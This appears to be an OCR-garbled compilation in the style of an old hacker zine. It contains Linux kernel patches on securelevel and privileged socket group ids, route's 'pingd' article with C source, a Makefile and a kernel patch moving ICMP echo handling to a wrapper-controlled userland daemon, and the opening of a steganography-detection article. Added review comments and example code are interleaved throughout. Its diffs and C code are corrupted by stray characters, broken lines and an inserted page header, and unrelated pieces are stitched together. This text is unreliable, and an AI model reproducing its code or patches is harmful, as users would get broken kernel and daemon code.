--- linux-stock/kernel/sched.c Fri Oct 17 13:17:43 1997 
+++ linux-patched/kernel/sched.c Sun Nov. 9 01:11:01 1997 
@@ -44,7 +44,11 @@ 

* kernel variables 


*/ 

+#ifdef CONFIG_SECURE_ON 

int securelevel = 1; /* system security level */ 
+#else 

int securelevel = 0; /* system security level */ 
+#endif 

long tick = (1000000 + HZ/2) / HZ; /* timer interrupt period */ 
volatile struct timeval xtime; /* The current time */ 
diff -ru linux-stock/mm/mmap.c linux-patched/mm/mmap.c 
—--— linux-stock/mm/mmap.c Fri Nov 22 06:25:17 1996 
+++ linux-patched/mm/mmap.c Tue Nov 11 00:48:26 1997 


@@ -308,7 +308,11 @@ 
if (len > TASK_SIZE) 
return 0; 
if (!addr) 
+#ifdef MMAP ADDR 
r addr = MMAP_ADDR; 


t+#else 


addr 


TASK_SIZE / 3; 


+#endif 
addr = PAGE ALIGN (addr) ; 


for (vmm = find_vma(current->mm, addr); ; vmm = vmm->vm_next) { 
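Review bot: the new MMAP_ADDR default of 0x00110000 (processor.h hunk) applies only when `current->binfmt == &elf_format` and PF_STACKEXEC is clear, yet neither hunk explains the value. Add a comment that the low base keeps shared libraries at addresses whose top byte is zero, and that a.out binaries and PF_STACKEXEC processes keep the old `TASK_SIZE / 3` base.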


diff -ru linux-stock/net/ipv4/af_inet.c linux-patched/net/ipv4/af_inet.c 
--- linux/net/ipv4/af_inet.c Fri Aug 15 12:23:23 1997 

+++ linux-stock/net/ipv4/af_inet.c Mon Dec 29 18:05:29 1997 

@@ -111,6 +111,15 @@ 


define min(a,b) ((a)<(b) ? (a): (b) ) 


+#ifdef CONFIG_SPLIT_GID 


+/* 
+ * Priveleged group ids 

+ */ 

+#define PROT_SOCK_GID 16 
+#define RAW_SOCK_GID 17 


+#define PACKET _SOCK_GID 18 
+#endif /* CONFIG _SPLIT_GID */ 


extern struct proto packet_prot; 
extern int raw_get_info(char *, char **, off_t, int, int); 
extern int snmp_get_info(char *, char **, off_t, int, int); 
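Review bot: PROT_SOCK_GID, RAW_SOCK_GID and PACKET_SOCK_GID are hard-wired to 16, 17 and 18 with no config option and no note on how they are expected to map onto /etc/group; document them at least in the Config.in help for CONFIG_SPLIT_GID, and "Priveleged" in the comment should read "Privileged".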
@@ -435,8 +444,26 @@ 

sk->no_check = UDP_NO_CHECK; 
prot=&udp_prot; 


} else if (sock->type == SOCK_RAW || sock->type == SOCK_PACKET) { 
+#ifdef CONFIG_SPLIT_GID 
4 /* 
+ * If we are not the super user, check to s if we have th 
+ * corresponding special group priviledge. 
fi: */ 
+ if (!suser()) 
a { 
+ if (sock->type == SOCK_RAW && current-—>egid != RAW_SOCK_GID) 


a { 

+ goto free_and_badperm; 

+ } 

+ else if (sock->type == SOCK_PACKET && current->egid != PACKET_SOCK_GID 


+ goto free_and_badperm; 


+ } 
+#else 


if (!suser()) 
goto free_and_badperm; 
+#endif /* CONFIG_SPLIT_GID */ 
if (!'!protocol) 
goto free_and_noproto; 
prot = &raw_prot; 
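Review bot: the group test compares `current->egid` only, so membership in RAW_SOCK_GID or PACKET_SOCK_GID through the supplementary group list is not honoured (in_group_p() would be the usual check) and a process must actually run with that effective gid, for instance via a setgid binary; say which behaviour is intended. The SOCK_PACKET branch also drops the braces the SOCK_RAW branch uses, which makes the two arms harder to compare than they need to be.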
@@ -621,7 +648,11 @@ 
if (snum == 0) 
snum = sk->prot-—>good_socknum() ; 
if (snum < PROT_SOCK) { 
+#ifdef CONFIG_SPLIT_GID 
+ if ('suser() && current-—>egid != PROT_SOCK_GID) 
+#else 


if (!suser() ) 
+#endif /* CONFIG _SPLIT_GID */ 
return (-EACCES) ; 
if (snum == 0) 
return (-EAGAIN) ; 
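Review bot: same egid-only check as in the socket-creation hunk: a caller whose supplementary groups include PROT_SOCK_GID but whose effective gid differs is still refused a port below PROT_SOCK; use in_group_p(PROT_SOCK_GID) if group membership rather than effective gid is the intended policy, and keep the two hunks consistent either way.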


----[ Linux Ping Daemon

-----[ route|daemon9 <route@infonexus.com>

----[ Introduction and Impetus

I have an idea. How about we rip ICMP_ECHO support from the kernel? How
about we employ a userland daemon that controls ICMP_ECHO reflection via TCP
wrapper access control? (Actually, this idea was originally (c) Asriel, who
did the 44BSD version. http://www.enteract.com/~tqbf/goodies.html. He just
asked me to do the linux version.)


The bastard son of this idea is pingd. A cute userland daemon that
handles all ICMP_ECHO and ICMP_ECHOREPLY traffic. The engine is simple. A
raw ICMP socket under Linux gets a copy of every ICMP datagram delivered to
the IP module (assuming the IP datagram is destined for an interface on that
host). We simply remove support of ICMP_ECHO processing from the kernel and
erect a userland daemon with a raw ICMP socket to handle these packets.

Once we have the packet, we do some basic sanity checks such as packet
type and code, and packet size. Next, we pass the packet to the authentication
mechanism where it is checked against the access control list. If the packet
is allowed, we send a response, otherwise we drop it on the floor.

The rule for this project was primarily security and then efficiency. The
next version will have an option to send ICMP_HOST_UNREACH to an offending
host. I may also at some point add some hooks for some sort of payload
content analysis (read: LOKI detection) but for now, pingd stands as is.
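pingd's receive path, as an added example that is not route's code: the same size and type checks, an access-control lookup and the in-place ECHO to ECHOREPLY reflection, run offline over a constructed ICMP_ECHO datagram. The ACL table, the IP4 macro, in_cksum() and the bounding of the IP total length against the bytes actually read are this example's own stand-ins and additions, not hosts_ctl() or libnet's ip_check().

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

#define HEADER_MATERIAL 28      /* 20-byte IP header + 8-byte ICMP header */
#define MAX_PAYLOAD     8096    /* same bound pingd.h uses */
#define ICMP_ECHO       8
#define ICMP_ECHOREPLY  0
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((b) << 16) | ((c) << 8) | (d))

/* Byte layout pingd reads off its raw socket: IP hdr, ICMP hdr, payload.
 * Multi-byte fields stay in network byte order, as on the wire. */
struct icmp_packet {
    uint8_t  vhl, tos;   uint16_t ip_len, id, off;
    uint8_t  ttl, proto; uint16_t ip_sum;    uint32_t src, dst;
    uint8_t  type, code; uint16_t icmp_sum;  uint16_t ident, seq;
    uint8_t  payload[MAX_PAYLOAD];
};
enum verdict { PING_DROP_SIZE, PING_DROP_TYPE, PING_DENIED, PING_REFLECTED,
               PING_BAD_REPLY };

/* RFC 1071 one's-complement checksum, standing in for libnet's ip_check(). */
static uint16_t in_cksum(const uint8_t *buf, size_t n)
{
    uint32_t sum = 0;
    for (; n > 1; n -= 2, buf += 2) sum += (uint16_t)(buf[0] << 8 | buf[1]);
    if (n) sum += (uint16_t)(buf[0] << 8);          /* odd trailing byte */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Constructed access list standing in for hosts_ctl(): first match wins,
 * no match means allow (tcpd's default when neither file matches). */
struct acl { uint32_t net, mask; int allow; };
static const struct acl ACL[] = {
    { IP4(192,168,2,34), 0xffffffffu, 0 },  /* "ping : evil.com" in hosts.deny */
    { IP4(192,168,2,0),  0xffffff00u, 1 },  /* the rest of the test LAN */
};

static int acl_allows(uint32_t src)
{
    for (size_t i = 0; i < sizeof ACL / sizeof ACL[0]; i++)
        if ((src & ACL[i].mask) == ACL[i].net) return ACL[i].allow;
    return 1;
}

/* 1 when the checksum over the whole ICMP part (header + data) verifies. */
int icmp_checksum_ok(const struct icmp_packet *p)
{
    size_t total = ntohs(p->ip_len);
    return total >= HEADER_MATERIAL && total <= sizeof *p &&
           in_cksum(&p->type, total - 20) == 0;
}

/* One trip through pingd's loop for a datagram of nread bytes: size and type
 * checks, access control, then in-place reflection as ICMP_ECHOREPLY. Beyond
 * pingd, the IP total length is bounded by nread before it is trusted. */
enum verdict pingd_process(struct icmp_packet *p, size_t nread, size_t max_packet)
{
    size_t total = ntohs(p->ip_len);
    if (nread < HEADER_MATERIAL || nread > max_packet ||
        total < HEADER_MATERIAL || total > nread)
        return PING_DROP_SIZE;
    if (p->type != ICMP_ECHO)
        return PING_DROP_TYPE;
    if (!acl_allows(ntohl(p->src)))
        return PING_DENIED;
    uint32_t tmp = p->dst; p->dst = p->src; p->src = tmp;   /* flip addresses */
    p->type = ICMP_ECHOREPLY;
    p->icmp_sum = 0;                                 /* recompute over ICMP part */
    p->icmp_sum = htons(in_cksum(&p->type, total - 20));
    return PING_REFLECTED;
}

/* Build a constructed ICMP_ECHO; 56 data bytes matches ping's default. */
size_t build_echo(struct icmp_packet *p, uint32_t src, uint32_t dst,
                  uint16_t seq, size_t datalen)
{
    memset(p, 0, sizeof *p);
    p->vhl = 0x45; p->ttl = 64; p->proto = 1;       /* IPv4, 20-byte hdr, ICMP */
    p->ip_len = htons((uint16_t)(HEADER_MATERIAL + datalen));
    p->src = htonl(src); p->dst = htonl(dst);
    p->type = ICMP_ECHO; p->ident = htons(0x1234); p->seq = htons(seq);
    for (size_t i = 0; i < datalen; i++) p->payload[i] = (uint8_t)i;
    p->icmp_sum = htons(in_cksum(&p->type, 8 + datalen));
    return HEADER_MATERIAL + datalen;
}

/* Push one constructed echo from src through the daemon. PING_REFLECTED is
 * reported only if the reply is consistent (addresses swapped, type 0, valid
 * ICMP checksum); an inconsistent reply yields PING_BAD_REPLY. */
enum verdict run_case(uint32_t src, uint8_t type, size_t nread)
{
    struct icmp_packet pkt;
    build_echo(&pkt, src, IP4(192,168,2,35), 7, 56);
    pkt.type = type;                                /* tamper after building */
    enum verdict v = pingd_process(&pkt, nread, HEADER_MATERIAL + MAX_PAYLOAD);
    if (v != PING_REFLECTED) return v;
    return pkt.src == htonl(IP4(192,168,2,35)) && pkt.dst == htonl(src) &&
           pkt.type == ICMP_ECHOREPLY && icmp_checksum_ok(&pkt)
           ? PING_REFLECTED : PING_BAD_REPLY;
}
```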


----[ Compilation and Installation

You will need libwrap and libnet. Libwrap comes with Wietse Venema's Tcp
wrapper package and is available from ftp://ftp.win.tue.nl/pub/security/.
The libnet networking library is available from:
http://www.infonexus.com/~daemon9/Projects/libnet.tar.gz.

Build and install both libraries according to their respective instructions.

Build the program and apply the kernel patch.
    `make all` OR (`make pingd` AND `make patch`)

Recompile your kernel. It is NOT necessary to make {config, dep, clean}.
It is only necessary to:

    `make; make install`

(or the equivalent).

Test the daemon. Ensure that there are no wrapper entries in
/etc/hosts.{deny,allow} and start the daemon in debug mode.

    `./pingd -d1` and then `ping 0`

Edit your TCP wrapper access control files. Simply add a new service
(ping) and the IP addresses you want to allow or deny:

    `cat >> /etc/hosts.deny`
    ping : evil.com

Install the program and add it to your /etc/rc.d/rc.local:

    `make install`


----[ Empirical Data

This is slower than doing it in the kernel. Especially on localhost. How
about that. Remotely, the RTT's are about .7 - .9 ms longer with a concise
/etc/hosts.{allow,deny}. This is the price you pay for a more secure
implementation. All the hosts are on the same 10MB network, with
approximately the same speed NICs.

The following Linux machine has a normal kernel-based ICMP_ECHO reflector
mechanism:

resentment:/# ping 192.168.2.34
PING 192.168.2.34 (192.168.2.34): 56 data bytes
64 bytes from 192.168.2.34: icmp_seq=0 ttl=64 time=0.8 ms
64 bytes from 192.168.2.34: icmp_seq=1 ttl=64 time=0.6 ms
64 bytes from 192.168.2.34: icmp_seq=2 ttl=64 time=0.8 ms

--- 192.168.2.34 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.6/0.7/0.8 ms

This machine is running pingd compiled with -DLOG (and has no kernel
ICMP_ECHO support):

resentment:/# ping 192.168.2.35
PING 192.168.2.35 (192.168.2.35): 56 data bytes
64 bytes from 192.168.2.35: icmp_seq=0 ttl=64 time=1.5 ms
64 bytes from 192.168.2.35: icmp_seq=1 ttl=64 time=1.4 ms
64 bytes from 192.168.2.35: icmp_seq=2 ttl=64 time=1.3 ms

--- 192.168.2.35 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 1.3/1.4/1.5 ms

Stress-test of the same host (not recommended to do with debugging on):

torment# /sbin/ping -f -c 10000 192.168.2.35
PING 192.168.2.35 (192.168.2.35): 56 data bytes

--- 192.168.2.35 ping statistics ---
10088 packets transmitted, 10000 packets received, 0% packet loss
round-trip min/avg/max = 0.985/36.790/86.075 ms

resentment:~# ping -f -c 10000 192.168.2.35
PING 192.168.2.35 (192.168.2.35): 56 data bytes

--- 192.168.2.35 ping statistics ---
10001 packets transmitted, 10000 packets received, 0% packet loss
round-trip min/avg/max = 1.0/1.2/17.4 ms

An example of the wrapper log:

Jan 16 18:23:03 shattered pingd: started: 997
Jan 16 18:24:52 shattered pingd: ICMP_ECHO allowed by wrapper
    (64 bytes from 192.168.2.38)
Jan 16 18:24:54 shattered last message repeated 2 times
Jan 16 18:26:50 shattered pingd: ICMP_ECHO allowed by wrapper
    (64 bytes from 192.168.2.37)
Jan 16 18:26:58 shattered last message repeated 10087 times
Jan 16 18:30:09 shattered pingd: ICMP_ECHO allowed by wrapper
    (64 bytes from 192.168.2.38)
Jan 16 18:30:19 shattered last message repeated 10000 times
Jan 16 18:47:30 shattered pingd: ICMP_ECHO denied by wrapper
    (64 bytes from 192.168.2.34)
Jan 16 18:47:32 shattered last message repeated 2 times
Jan 16 18:48:16 shattered pingd: packet too large
    (10008 bytes from 192.168.2.38)
Jan 16 18:48:17 shattered last message repeated 2 times

The code:

<++> Pingd/Makefile
#
#   linux pingd Makefile
#   daemon9|route <route@infonexus.com>
#
#   Define this if you want syslog logging of ICMP_ECHO traffic.  This slows
#   down daemon response time a bit.
#   default: enabled.
DEFINES     =   -DLOG
CC          =   gcc
VER         =   0.1
NETSRC      =   /usr/src/linux/net/ipv4
INSTALL_LOC =   /usr/sbin
PINGD       =   pingd
LIBS        =   -lnet -lwrap
DEFINES     +=  -D__BSD_SOURCE
CFLAGS      =   -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 -Wall
OBJECTS     =   pingd.o

.c.o:
	$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@

pingd: $(OBJECTS)
	$(CC) $(CFLAGS) $(OBJECTS) -o pingd $(LIBS)
	strip pingd

all: patch pingd

patch:
	@(/usr/bin/patch -d $(NETSRC) < patchfile)
	@(echo "Patchfile installed")
	@(echo "You must now recompile your kernel")
	@(echo "")

install: pingd
	(install -m755 $(PINGD) $(INSTALL_LOC))
	(echo "" >> /etc/rc.d/rc.local)
	(echo "echo \"Starting ping daemon\"" >> /etc/rc.d/rc.local)
	(echo "$(INSTALL_LOC)/$(PINGD)" >> /etc/rc.d/rc.local)

dist: clean
	@(cd ..; rm pingd-$(VER).tgz; tar cvzf pingd-$(VER).tgz Pingd/)

clean:
	rm -f *.o core pingd
# EOF
<-->


<++> Pingd/pingd.h
/*
 *  $Id$
 *
 *  Linux pingd sourcefile
 *  pingd.h - function prototypes, global data structures, and macros
 *  Copyright (c) 1998 by daemon9|route (route@infonexus.com)
 *
 *
 *
 */

#ifndef _PINGD_H
#define _PINGD_H

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>            /* bzero() */
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <pwd.h>
#include <syslog.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>

#define NOBODY          "nobody"    /* Nobody pwnam */
#define STRING_UNKNOWN  "unknown"   /* From tcpd.h */
#define HEADER_MATERIAL 28          /* ICMP == 8 bytes, IP == 20 bytes */
#define MAX_PAYLOAD     8096        /* Out of thin air */

struct icmp_packet
{
    struct ip iph;
    struct icmphdr icmph;
    u_char payload[MAX_PAYLOAD];
};

/* FUNCTION PROTOTYPES */
void
usage(
    char *                  /* pointer to argv[0] */
    );
int                         /* 1 if the packet is allowed, 0 if denied */
verify(
    struct icmp_packet *    /* pointer to the ICMP packet in question */
    );
void
icmp_reflect(
    struct icmp_packet *,   /* pointer to the ICMP packet in question */
    int                     /* socket file descriptor */
    );
int                         /* 1 if access is granted, 0 if denied */
hosts_ctl(
    char *,                 /* daemon name */
    char *,                 /* client name (canonical) */
    char *,                 /* client address (dots 'n' decimals) */
    char *                  /* client user (unused) */
    );
#endif /* _PINGD_H */
/* EOF */
<-->
<++> Pingd/pingd.c
/*
 *  $Id$
 *
 *  Linux pingd sourcefile
 *  pingd.c - main sourcefile
 *  Copyright (c) 1998 by daemon9|route <route@infonexus.com>
 *
 *
 *
 *  $Log$
 *
 */
#include "pingd.h"

int d = 0;                      /* Debugging level (defaults off) */
int max_packet = MAX_PAYLOAD;   /* Maximum packet size (default); the original
                                 * default literal did not survive extraction,
                                 * so the payload bound from pingd.h is used */

int
main(int argc, char **argv)
{
    int sock_fd, c;
    struct icmp_packet i_pack;
    struct passwd *pwd_p;

    /*
     *  Make sure we have UID 0.
     */
    if (geteuid() || getuid())
    {
        fprintf(stderr, "Inadequate privileges\n");
        exit(1);
    }
    /*
     *  Open a raw ICMP socket and set IP_HDRINCL.
     */
    if ((sock_fd = open_raw_sock(IPPROTO_ICMP)) == -1)
    {
        perror("socket allocation");
        exit(1);
    }
    /*
     *  Now that we have the raw socket, we no longer need root privileges
     *  so we drop our UID to nobody.
     */
    if (!(pwd_p = getpwnam(NOBODY)))
    {
        fprintf(stderr, "Can't get pwnam info on nobody\n");
        exit(1);
    }
    else if (setuid(pwd_p->pw_uid) == -1)
    {
        perror("Can't drop privileges");
        exit(1);
    }

    while ((c = getopt(argc, argv, "d:s:")) != EOF)
    {
        switch (c)
        {
            case 'd':
                d = atoi(optarg);
                break;
            case 's':
                max_packet = atoi(optarg);
                break;
            default:
                usage(argv[0]);
        }
    }
    if (!d) daemon(0, 0);       /* detach unless we are debugging */
    if (d) fprintf(stderr, "Max packetsize of %d bytes\n", max_packet);

#ifdef LOG
    openlog("pingd", 0, 0);
    syslog(LOG_DAEMON|LOG_INFO, "started: %d", getpid());
#endif /* LOG */

    /*
     *  We're powered up.  From here on out, everything should run swimmingly.
     */
    for (;;)
    {
        bzero(&i_pack, sizeof(i_pack));
        c = recv(sock_fd, (struct icmp_packet *)&i_pack, sizeof(i_pack), 0);
        if (c == -1)
        {
            if (d) fprintf(stderr, "truncated read: %s\n", strerror(errno));
            continue;
        }
        /*
         *  Make sure packet isn't too small or too big.
         */
        if (c < HEADER_MATERIAL || c > max_packet)
        {
#ifdef LOG
            syslog(
                LOG_DAEMON|LOG_INFO,
                "bad packet size (%d bytes from %s)",
                (int)(ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph)),
                host_lookup(i_pack.iph.ip_src.s_addr));
#endif /* LOG */
            continue;
        }
        /*
         *  We only want ICMP_ECHO packets.
         */
        if (i_pack.icmph.type != ICMP_ECHO) continue;
        else if (d)
            fprintf(stderr,
                "%d byte ICMP_ECHO from %s\n",
                (int)(ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph)),
                host_lookup(i_pack.iph.ip_src.s_addr));
        /*
         *  Pass packet to the access control mechanism.
         */
        if (!verify(&i_pack))
        {
#ifdef LOG
            syslog(
                LOG_DAEMON|LOG_INFO,
                "ICMP_ECHO denied by wrapper (%d bytes from %s)",
                (int)(ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph)),
                host_lookup(i_pack.iph.ip_src.s_addr));
#endif /* LOG */
        }
        else
        {
#ifdef LOG
            syslog(
                LOG_DAEMON|LOG_INFO,
                "ICMP_ECHO allowed by wrapper (%d bytes from %s)",
                (int)(ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph)),
                host_lookup(i_pack.iph.ip_src.s_addr));
#endif /* LOG */
            icmp_reflect(&i_pack, sock_fd);
        }
    }
}

void
icmp_reflect(struct icmp_packet *p_ptr, int sock_fd)
{
    int c;
    u_long tmp;
    struct sockaddr_in sin;

    bzero((struct sockaddr_in *)&sin, sizeof(sin));
    /*
     *  Formulate ICMP_ECHOREPLY response packet.  All we do is change the
     *  packet type and flip the IP addresses.  This avoids a copy.
     */
    tmp = p_ptr->iph.ip_dst.s_addr;
    p_ptr->iph.ip_dst.s_addr = p_ptr->iph.ip_src.s_addr;
    p_ptr->iph.ip_src.s_addr = tmp;
    p_ptr->icmph.type = ICMP_ECHOREPLY;
    p_ptr->icmph.checksum = 0;
    p_ptr->icmph.checksum =
        ip_check((u_short *)&p_ptr->icmph,
            ntohs(p_ptr->iph.ip_len) - sizeof(struct ip));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = p_ptr->iph.ip_dst.s_addr;

    c = sendto(sock_fd,
        (struct icmp_packet *)p_ptr,
        ntohs(p_ptr->iph.ip_len),
        0,
        (struct sockaddr *)&sin, sizeof(sin));

    if (c != ntohs(p_ptr->iph.ip_len))
    {
        if (d) perror("truncated write");
        return;
    }
    else if (d) fprintf(stderr, "ICMP_ECHOREPLY sent\n");
}

int
verify(struct icmp_packet *p_ptr)
{
    if (!hosts_ctl("ping",
            host_lookup(p_ptr->iph.ip_src.s_addr),
            host_lookup(p_ptr->iph.ip_src.s_addr),
            STRING_UNKNOWN))
return (0); 


else return (1); 


void 
usage(char *argv0) 


{ 


7.txt Wed Apr 26 09:43:42 2017 8 


fprintf(stderr, "usage: %s [-d 1|0 ] [-s maxpacketsize] \n",argv0) ; 
exit (0); 
} 
/* EOF */ 
<--> 
<++> Pingd/patchfile 
--- /usr/src/linux/net/ipv4/icmp.c.original Sat Jan 10 11:10:36 1998 
/usr/src/linux/net/ipv4/icmp.c Sat Jan 10 11:19:23 1998 
@@ -42,7 +42,8 @@ 
Elliot Poger : Added support for SO_BINDTODEVICE. 
Willy Konynenberg 2 Transparent proxy adapted to new 


socket hash code. 


route : TO) 3/9:82% ICMP_ECHO / ICMP_ECHOREQUEST 
support into userland. 


RFC1122 (Host Requirements Comm. Layer) Status: 
(boy, are there a lot of rules for ICMP) 
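Review bot: the changelog entry names "ICMP_ECHOREQUEST", which is not the constant this file uses (the table comments below say "ECHO REPLY (0)" and "ECHO (8)", the removed handler sets ICMP_ECHOREPLY, and the userland daemon tests for ICMP_ECHO); use ICMP_ECHO here and in the two "Disabled, we now do ICMP_ECHOREQUEST in userland" comments so that a reader grepping for the type name finds the change.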

@@ -882,28 +883,6 @@ 

kfree_skb(skb, FREE_READ) ; 


t 
+ + + + F F F HF F 


_/* 
eee Handle ICMP_ECHO ("ping") requests. 

ee 

= RFC 1122: 3.2.2.6 MUST have an echo server that answers ICMP echo requests. 

oe RFC 1122: 3.2.2.6 Data received in the ICMP_ECHO request MUST be included in the re 
ply. 

= RFC 1812: 4.3.3.6 SHOULD have a config option for silently ignoring echo requests, 
MUST have default=NOT. 

=e See also WRT handling of options once they are done and working. 

= #Y 


-static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, 
2 saddr, __u32 daddr, int len) 

st 

-#ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS 

= struct icmp_bxm icmp_param; 
= icmp_param.icmph=*icmph; 
- icmp_param.icmph.type=ICMP_ECHOREPLY; 

7 icmp_param.data_ptr=(icmpht1) ; 

aa icmp_param.data_len=len; 

- if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) 
icmp_build_xmit (&icmp_param, daddr, saddr, skb->ip_hdr->tos); 


Ct] 


- kfree_skb(skb, FREE READ) ; 


~ Handle ICMP Timestamp requests. 
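Review bot: icmp_echo() is deleted outright instead of being disabled behind a configuration option, so a kernel built with this patch never answers echo requests unless the userland daemon happens to be running; that contradicts the RFC 1122 3.2.2.6 MUST quoted in the very comment being removed and also throws away the existing CONFIG_IP_IGNORE_ECHO_REQUESTS switch. Keep the function and add a config option (or a sysctl) that selects between in-kernel and userland handling, so the default behaviour is unchanged and running without pingd is a deliberate choice rather than a silent loss of service.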
@@ -1144,8 +1123,8 @@ 
i, 


static struct icmp_control icmp_pointers[19] = { 

-/* ECHO REPLY (0) */ 

- é&icmp_statistics.IcmpOutEchoReps, &icmp_statistics.IcmpIn 

L }, 

+/* ECHO REPLY (0) - Disabled, we now do ICMP_ECHOREQUEST in 

+ édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, N 
édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, N 

édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, N 

/* DEST UNREACH (3) */ 
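Review bot: the ECHO REPLY (0) entry already pointed at icmp_discard with error flag 0 and the IcmpInEchoReps counter, so replacing it with &dummy, &icmp_statistics.IcmpInErrors and error flag 1 does nothing for the userland goal but makes every legitimate echo reply count as an ICMP input error in the SNMP statistics. Drop this hunk and leave the original entry in place.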

@@ -1156,8 +1135,8 @@ 

é&icmp_statistics.IcmpOutRedirects, é&icmp_statistics.IcmpInRedirects, icmp_redirect, 

&xrl_ redirect }, 

édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 


Gl 


choReps, icmp_discard, 0, 


userland */ 
U }, 
ULL }, 
U Pe 


__u3 


NUL 
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{ &édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
-/* ECHO (8) */ 
- { &icmp_statistics.IcmpOutEchos, &icmp_statistics.IcmpInEchos, icmp_echo, 
+/* ECHO (8) - Disabled, we now do ICMP_ECHOREQUEST in userland */ 
+ { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
{ &édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
{ &édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
/* TIME EXCEEDED (11) */ 
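Review bot: the new ECHO (8) entry counts every incoming echo request as IcmpInErrors and stops updating IcmpInEchos, so management tools lose sight of echo traffic entirely once this is applied. If the in-kernel handler is to go, only swap icmp_echo for icmp_discard and keep &icmp_statistics.IcmpInEchos with error flag 0, as the original entry had.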
<--> 


0, 


NULL }, 
[ Steganography Thumbprinting 


[ The HackLab (http://www.hacklab.com) 


Steg*a*nog"ra*phy (?), n. [Gr. covered (fr. to cover closely) + 
-graphy.] The art of writing in cipher, or in characters which are not 
intelligible except to persons who have the key; cryptography. 


i. Introduction 


While this may be a general description of cryptography, steganography has 
come to describe not only the act of encrypting data, but also of hiding its 
very existence. Steganography (or "stego") uses techniques to store a 
"message" file within a "container" file by altering the container file in 
such a way as to make the original file _appear_ unchanged. The resulting 
file can be referred to as the stego file and contains the message file 
enclosed in a close approximation of the original container file. Several 
tools exist (mostly for DOS/Windows/NT) which automate these functions using 
DES, DES3 or IDEA as encryption methods and BMP, GIF, JPG, WAV, VOC and even 
ASCII files as containers. Using these tools, data can be hidden within 
images, sounds, and even other data files. However, these tools do leave 
perceptible traces on their container files and do not offer nearly the 
level of obfuscation the user assumes. 


This article will provide the reader with a fundamental understanding of 
basic stego techniques and will highlight some of the "thumbprints" left by 
modern steganographic toolsets, specifically on graphic images. Not intended 
to challenge the cryptographic strength or perceptible mathematical variances 
of current steganographic techniques, this article will give the reader a 
basic understanding of stego and suggest low-budget methods for detecting and 
cracking basic steganographic techniques. Also presented is a program which 
can be used to brute-force two of the most popular stego toolsets. 


I. Basic Steganography 


Simply put, steganography involves the hiding of messages. While there are 
many techniques employed by the various tools, the least common denominator 
amongst most toolsets is the modification of some of the Least Significant 
Bits (or LSBs) of the container file’s individual bytes. In the simplest 
example, consider the following binary representations of the numbers 20 
through 27: 


10100 10101 10110 10111 11000 11001 11010 11011 


By modifying the LSBs of these binary digits, we can hide the binary 
representation of the number 200 (11001000) across the above bytestream: 


10101 10101 10110 10110 11001 11000 11010 11010 


By reconstructing the LSBs of the above bytestream, we recover the number 
200 (11001000). In the above example, the original bytestream of the numbers 
20-27 is the container, while the number 200 is the message file. This is a 
very poor basic example since the resulting stego file is not an accurate 
representation of the original file. After modification to include the 
message file, the numbers 20-27 now read: 


21 21 22 22 25 24 26 26 


However, in most stego applications, the container file does not contain 
bytestreams which are rendered useless by modifying LSB information. 
Instead, container files typically contain various levels of "noise" at the 
level of the LSBs which, when viewed apart from the rest of the byte, can 
appear random. A sound (.WAV) file, for example, contains mostly inaudible 
background noise at the LSB level. An 8-bit graphic file will contain minor 
color differences at the LSB level, while a 24-bit image will contain color 
changes which are nearly imperceptible to the human eye. A very common 
container format is a 256 color, 8 bit image such as a GIF or BMP file. 
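As an added illustration (not code from the article), the following Python carries the LSB scheme above through in general: it embeds any bit string into the low bits of a byte stream and extracts it again, using the article's own 20-27 / 200 example as the sample input. The changed_values helper counts how many container values the embedding actually altered, since a bit only flips when it differs from the LSB already there.

```python
"""LSB embedding and extraction over a byte stream.

Added example, not code from the article.  The container is any sequence of
integers (pixel values, palette indices, audio samples); the message is a
sequence of bits written one per container value, most significant bit first.
"""


def int_to_bits(value, width):
    """Big-endian bit list of value, e.g. int_to_bits(200, 8) -> 1,1,0,0,1,0,0,0."""
    return [(value >> (width - 1 - i)) & 1 for i in range(width)]


def bits_to_int(bits):
    """Inverse of int_to_bits."""
    result = 0
    for bit in bits:
        result = (result << 1) | bit
    return result


def embed_lsb(container, message_bits):
    """Return a copy of container whose first len(message_bits) values carry
    the message in their least significant bit."""
    if len(message_bits) > len(container):
        raise ValueError("container has fewer values than the message has bits")
    stego = list(container)
    for pos, bit in enumerate(message_bits):
        stego[pos] = (stego[pos] & ~1) | bit      # clear the LSB, then set it
    return stego


def extract_lsb(stego, nbits):
    """Read the message back: the LSB of each of the first nbits values."""
    return [value & 1 for value in stego[:nbits]]


def changed_values(container, stego):
    """How many container values the embedding altered (a bit only flips when
    it differs from the LSB that was already there)."""
    return sum(1 for a, b in zip(container, stego) if a != b)


def embed_text(container, text):
    """Hide a short ASCII string: each character as 8 bits, MSB first."""
    bits = [bit for ch in text.encode("ascii") for bit in int_to_bits(ch, 8)]
    return embed_lsb(container, bits)


def extract_text(stego, nchars):
    """Recover nchars ASCII characters hidden by embed_text."""
    bits = extract_lsb(stego, nchars * 8)
    return bytes(bits_to_int(bits[i:i + 8])
                 for i in range(0, len(bits), 8)).decode("ascii")


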